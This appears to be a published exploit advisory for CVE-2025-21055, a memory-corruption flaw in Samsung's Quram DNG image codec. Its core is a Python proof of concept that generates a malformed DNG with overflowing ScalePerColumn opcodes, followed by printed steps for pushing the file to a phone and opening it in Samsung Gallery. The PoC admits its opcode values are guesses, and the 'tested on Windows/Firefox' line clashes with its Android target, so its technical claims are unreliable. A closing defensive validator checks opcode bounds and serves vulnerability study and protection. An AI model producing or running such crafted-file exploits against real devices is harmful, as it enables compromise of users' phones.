| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-21055 | 10 Oct 2025 07:09 | – | circl |
| SAMSUNG Mobile devices security vulnerability | 10 Oct 2025 00:00 | – | cnnvd |
| Unspecified vulnerability in SAMSUNG Mobile devices (CNVD-2025-24783) | 21 Oct 2025 00:00 | – | cnvd |
| CVE-2025-21055 | 10 Oct 2025 06:33 | – | cve |
| CVE-2025-21055 | 10 Oct 2025 06:33 | – | cvelist |
| EUVD-2025-33677 | 10 Oct 2025 09:30 | – | euvd |
| CVE-2025-21055 | 10 Oct 2025 07:15 | – | nvd |
| CVE-2025-21055 | 10 Oct 2025 07:15 | – | osv |
| Samsung Quram DNG Advanced Remote Code Execution | 9 Feb 2026 00:00 | – | packetstorm |
| PT-2025-41516 | 10 Oct 2025 00:00 | – | ptsecurity |
=============================================================================================================================================
| # Title : Android 13 Quram DNG Codec Memory Corruption Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/n_africa/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211371/ & CVE-2025-21055 https://packetstorm.news/download/211371
[+] Summary :
CVE‑2025‑21055 is an Out‑of‑Bounds Read/Write vulnerability in **Samsung’s Quram image codec library** (`libimagecodec.quram.so`).
The flaw is triggered when the library processes a maliciously crafted image file, causing memory access outside the intended buffer boundaries.
Successful exploitation can result in **information disclosure**, **application crash**, or potentially **arbitrary code execution**,
depending on the attack scenario. The issue affects Samsung devices running vulnerable versions of the Quram codec **prior to the security update SMR October 2025 Release 1**.
Samsung addressed the vulnerability by releasing a patched version of the image codec library in the October 2025 Security Maintenance Release (SMR).
[+] Vulnerability: Remote Code Execution in Samsung’s libimagecodec.quram.so library.
[+] Affected software: Samsung devices running Android 13 with firmware older than SMR Oct‑2025 Release 1.
[+] Impact: An attacker can exploit the vulnerability via specially crafted image files to execute arbitrary code on the device.
[+] Affected devices: All Samsung devices using the vulnerable library version, including (but not limited to) Galaxy S22, S23, S24, Z Fold4, Z Flip4—only if firmware is unpatched.
[+] Patch/Remediation: Apply the October 2025 SMR or later security update.
[+] POC : python poc.py
```python
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-21055
Quram DNG Codec Memory Corruption Vulnerability
"""
import struct
import os


def create_malicious_dng():
    """
    Create a DNG file designed to trigger the flaw in QuramDngOpcodeScalePerColumn
    """
    # Basic DNG file structure with custom opcodes
    dng_data = bytearray()
    # TIFF Header (required for DNG files)
    dng_data.extend(b'II*\x00')               # Little-endian TIFF
    dng_data.extend(struct.pack('<I', 8))     # Offset to IFD0
    # IFD0 - Basic tags
    ifd0_data = bytearray()
    ifd0_data.extend(struct.pack('<H', 9))    # Number of entries (nine tags are written below)
    # ImageWidth (required) - Tag 256, Type=LONG (4), Count=1, Value=100
    ifd0_data.extend(struct.pack('<HHI', 256, 4, 1))
    ifd0_data.extend(struct.pack('<I', 100))
    # ImageLength (required) - Tag 257, Type=LONG (4), Count=1, Value=100
    ifd0_data.extend(struct.pack('<HHI', 257, 4, 1))
    ifd0_data.extend(struct.pack('<I', 100))
    # BitsPerSample - Tag 258, Type=SHORT (3), Count=3
    ifd0_data.extend(struct.pack('<HHI', 258, 3, 3))
    bits_per_sample_offset = len(dng_data) + len(ifd0_data) + 4
    ifd0_data.extend(struct.pack('<I', bits_per_sample_offset))
    # Compression - Tag 259, Type=SHORT (3), Count=1, Value=1 (No compression)
    ifd0_data.extend(struct.pack('<HHI', 259, 3, 1))
    ifd0_data.extend(struct.pack('<H', 1))    # Value in the offset field
    ifd0_data.extend(b'\x00\x00')             # Padding
    # PhotometricInterpretation - Tag 262, Type=SHORT (3), Count=1, Value=32803 (CFA)
    ifd0_data.extend(struct.pack('<HHI', 262, 3, 1))
    ifd0_data.extend(struct.pack('<H', 32803))
    ifd0_data.extend(b'\x00\x00')             # Padding
    # DNG-specific tags
    # DNGVersion - Tag 50706, Type=BYTE (1), Count=4, Value=[1,0,0,0]
    ifd0_data.extend(struct.pack('<HHI', 50706, 1, 4))
    dng_version_offset = len(dng_data) + len(ifd0_data) + 4
    ifd0_data.extend(struct.pack('<I', dng_version_offset))
    # DNGBackwardVersion - Tag 50707, Type=BYTE (1), Count=4, Value=[1,0,0,0]
    ifd0_data.extend(struct.pack('<HHI', 50707, 1, 4))
    dng_backward_offset = len(dng_data) + len(ifd0_data) + 4
    ifd0_data.extend(struct.pack('<I', dng_backward_offset))
    # OpcodeList1 - the critical point of the attack - Tag 51008
    opcode_list = create_malicious_opcodes()
    ifd0_data.extend(struct.pack('<HHI', 51008, 1, len(opcode_list)))
    opcode_list_offset = len(dng_data) + len(ifd0_data) + 4
    ifd0_data.extend(struct.pack('<I', opcode_list_offset))
    # CFAPattern - Tag 33421, Type=BYTE (1), Count=4
    ifd0_data.extend(struct.pack('<HHI', 33421, 1, 4))
    cfa_pattern_offset = len(dng_data) + len(ifd0_data) + 4
    ifd0_data.extend(struct.pack('<I', cfa_pattern_offset))
    # Simple CFA pattern - RGGB
    cfa_pattern = b'\x00\x01\x01\x02'
    # Additional data
    ifd0_data.extend(struct.pack('<I', 0))    # Offset to next IFD
    # Merge all the data
    dng_data.extend(ifd0_data)
    # Append the referenced data
    # BitsPerSample data
    dng_data.extend(struct.pack('<HHH', 16, 16, 16))
    # DNGVersion data
    dng_data.extend(b'\x01\x00\x00\x00')
    # DNGBackwardVersion data
    dng_data.extend(b'\x01\x00\x00\x00')
    # CFA Pattern data
    dng_data.extend(cfa_pattern)
    # Add the OpcodeList at the correct position
    opcode_pos = opcode_list_offset - len(dng_data)
    if opcode_pos < 0:
        # If the position is negative, add padding
        padding_needed = -opcode_pos
        dng_data.extend(b'\x00' * padding_needed)
        dng_data.extend(opcode_list)
    else:
        # If the position is positive, add at the specified position
        if len(dng_data) < opcode_list_offset:
            dng_data.extend(b'\x00' * (opcode_list_offset - len(dng_data)))
        dng_data.extend(opcode_list)
    return bytes(dng_data)


def create_malicious_opcodes():
    """
    Create opcodes designed to trigger the flaw in ScalePerColumn
    """
    opcodes = bytearray()
    # Opcode ID for ScalePerColumn (assumed value - needs verification)
    scale_per_column_id = 0x0000000A
    # Version
    opcodes.extend(struct.pack('<I', 1))
    # Area coordinates - values designed to trigger an integer overflow
    # Use large values to overflow the calculations
    top = 0x00000000
    left = 0x00000000
    bottom = 0xFFFFFFFF   # Very large value
    right = 0xFFFFFFFF    # Very large value
    opcodes.extend(struct.pack('<IIII', top, left, bottom, right))
    # Column count - abnormal value
    column_count = 0x7FFFFFFF   # Approximately MAX_INT
    opcodes.extend(struct.pack('<I', column_count))
    # Scale factors - values designed to trigger the flaw in the calculations
    # Use values that lead to invalid memory addresses
    for i in range(100):   # Large number of factors
        # Values designed to form an illegal memory address
        if i % 4 == 0:
            factor = 0xB4000000 + (i * 0x1000)   # Attempt to reach the crash address
        else:
            factor = 0x00000001   # Normal values to avoid early detection
        opcodes.extend(struct.pack('<I', factor & 0xFFFFFFFF))
    return opcodes


def create_simplified_indoushka():
    """
    Simplified version of the malicious file, focusing on the essential part
    """
    dng_data = bytearray()
    # Simple TIFF header
    dng_data.extend(b'II*\x00\x08\x00\x00\x00')   # Header + offset to IFD
    # IFD with a small number of tags
    ifd_data = bytearray()
    ifd_data.extend(struct.pack('<H', 5))   # 5 entries
    # ImageWidth
    ifd_data.extend(struct.pack('<HHI', 256, 4, 1))
    ifd_data.extend(struct.pack('<I', 100))
    # ImageLength
    ifd_data.extend(struct.pack('<HHI', 257, 4, 1))
    ifd_data.extend(struct.pack('<I', 100))
    # Compression
    ifd_data.extend(struct.pack('<HHI', 259, 3, 1))
    ifd_data.extend(struct.pack('<H', 1))
    ifd_data.extend(b'\x00\x00')
    # PhotometricInterpretation (CFA)
    ifd_data.extend(struct.pack('<HHI', 262, 3, 1))
    ifd_data.extend(struct.pack('<H', 32803))
    ifd_data.extend(b'\x00\x00')
    # OpcodeList1 - focus on the important part
    ifd_data.extend(struct.pack('<HHI', 51008, 1, 1000))   # Large size
    opcode_offset = len(dng_data) + len(ifd_data) + 4
    ifd_data.extend(struct.pack('<I', opcode_offset))
    # No next IFD
    ifd_data.extend(struct.pack('<I', 0))
    dng_data.extend(ifd_data)
    # Add malicious opcodes
    opcodes = bytearray()
    opcodes.extend(struct.pack('<I', 1))   # version
    # Very large coordinates
    opcodes.extend(struct.pack('<IIII', 0, 0, 0x7FFFFFFF, 0x7FFFFFFF))
    # Scale factors designed to cause memory corruption
    for i in range(200):
        if i == 50:   # In the middle of the data, add the malicious values
            opcodes.extend(struct.pack('<I', 0xB4000079))
            opcodes.extend(struct.pack('<I', 0x2607A000))
        else:
            opcodes.extend(struct.pack('<I', i))
    # Make sure the data sits at the correct position
    if len(dng_data) < opcode_offset:
        dng_data.extend(b'\x00' * (opcode_offset - len(dng_data)))
    dng_data.extend(opcodes)
    return bytes(dng_data)


def indoushka_via_gallery(file_path):
    """
    Attempt to exploit the vulnerability through file processing in the Gallery
    """
    print(f"[+] Creating malicious DNG file: {file_path}")
    try:
        # Try to create the file with the complex method first
        malicious_dng = create_malicious_dng()
        print("[+] Complex DNG created successfully")
    except Exception as e:
        print(f"[-] Complex method failed: {e}")
        print("[+] Trying simplified method...")
        malicious_dng = create_simplified_indoushka()
        print("[+] Simplified DNG created successfully")
    with open(file_path, 'wb') as f:
        f.write(malicious_dng)
    file_size = os.path.getsize(file_path)
    print(f"[+] Malicious DNG file created: {file_path} ({file_size} bytes)")
    print("\n[+] Trigger methods:")
    print(" 1. Copy file to device: adb push indoushka.dng /sdcard/Download/")
    print(" 2. Open file in Samsung Gallery")
    print(" 3. Use 'Set as wallpaper' feature")
    print(" 4. Share the image to Gallery")
    print(" 5. Wait for automatic thumbnail generation")


def analyze_crash():
    """
    Analyze the crash information from the attached log
    """
    print("\n[!] Crash Analysis:")
    print(" - Fault address: 0xb40000792607a000 (non-canonical ARM64 address)")
    print(" - Crash in: QuramDngOpcodeScalePerColumn::processArea()")
    print(" - Likely cause: Integer overflow in memory calculation")
    print(" - Attack vector: Malicious ScalePerColumn opcode in DNG")


if __name__ == "__main__":
    print("CVE-2025-21055 - Quram DNG Codec PoC")
    print("=====================================")
    output_file = "indoushka.dng"
    analyze_crash()
    indoushka_via_gallery(output_file)
    print(f"\n[!] PoC file '{output_file}' generated successfully")
    print("[!] Test on isolated device only!")
    print("[!] Actual exploitation requires precise opcode values from reverse engineering")
```
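The summary describes the bug as the codec failing to keep a ScalePerColumn opcode's area inside the image buffer. As an added defensive example (not part of the advisory or of Samsung's code), the validator below parses a DNG OpcodeList blob and flags per-row/per-column opcodes whose area rectangle or parameter count is inconsistent with the image; it assumes the DNG 1.4 opcode-list layout (big-endian count, then id/version/flags/parameter_bytes per opcode, and top/left/bottom/right/plane/planes/rowPitch/colPitch/count parameters), which differs from the guessed layout the PoC above writes, and the two sample opcode lists are constructed for the demonstration.

```python
import struct
# Opcode IDs of the per-row/per-column correction family (DNG 1.4 spec; assumed here).
PER_ROW_COL_OPCODES = {10: "DeltaPerRow", 11: "DeltaPerColumn",
                       12: "ScalePerRow", 13: "ScalePerColumn"}
AREA_HEADER = 36  # top,left,bottom,right,plane,planes,rowPitch,colPitch,count as 9 x uint32

def validate_opcode_list(blob, image_width, image_length):
    """Return findings for a DNG OpcodeList blob; an empty list means it passed.
    Assumed layout (big-endian): uint32 count, then per opcode uint32 id, version,
    flags, parameter_bytes, followed by parameter_bytes of parameters."""
    findings = []
    if len(blob) < 4:
        return ["opcode list shorter than its 4-byte count field"]
    (count,) = struct.unpack_from(">I", blob, 0)
    pos = 4
    for n in range(count):
        if pos + 16 > len(blob):
            findings.append(f"opcode {n}: header runs past end of list")
            break
        op_id, _ver, _flags, nbytes = struct.unpack_from(">IIII", blob, pos)
        pos += 16
        params = blob[pos:pos + nbytes]
        if len(params) != nbytes:
            findings.append(f"opcode {n} (id {op_id}): declares {nbytes} parameter bytes, only {len(params)} present")
            break
        pos += nbytes
        if op_id not in PER_ROW_COL_OPCODES or nbytes < AREA_HEADER:
            continue
        name = PER_ROW_COL_OPCODES[op_id]
        top, left, bottom, right, _pl, _pls, _rpitch, _cpitch, cnt = struct.unpack_from(">9I", params, 0)
        # The boundary check the codec must enforce: the area has to lie inside the image.
        if top > bottom or left > right or bottom > image_length or right > image_width:
            findings.append(f"opcode {n} ({name}): area ({top},{left})-({bottom},{right}) exceeds the {image_width}x{image_length} image")
        # Each per-column/per-row value is a float32, so the count must match the declared size.
        if AREA_HEADER + 4 * cnt != nbytes:
            findings.append(f"opcode {n} ({name}): count {cnt} does not match {nbytes} parameter bytes")
    return findings

def build_opcode(op_id, top, left, bottom, right, values):
    """Serialize one per-row/per-column opcode (plane 0, 1 plane, pitch 1) in the assumed layout."""
    params = struct.pack(">9I", top, left, bottom, right, 0, 1, 1, 1, len(values))
    params += struct.pack(f">{len(values)}f", *values)
    return struct.pack(">IIII", op_id, 0x01040000, 0, len(params)) + params  # 0x01040000 = DNG 1.4.0.0

def sample_reports():
    """Constructed samples: an in-bounds ScalePerColumn, and one with the PoC's 0xFFFFFFFF extents, on a 100x100 image."""
    good = struct.pack(">I", 1) + build_opcode(13, 0, 0, 100, 4, [1.0] * 4)
    bad = struct.pack(">I", 1) + build_opcode(13, 0, 0, 0xFFFFFFFF, 0xFFFFFFFF, [1.0] * 4)
    return validate_opcode_list(good, 100, 100), validate_opcode_list(bad, 100, 100)
```

Run against the OpcodeList1 (tag 51008), OpcodeList2 (51009) and OpcodeList3 (51022) blobs extracted from a DNG, with ImageWidth and ImageLength taken from the same IFD, this gives a file-level check a gateway or gallery app can apply before handing the image to a native codec.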
Greetings to :
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)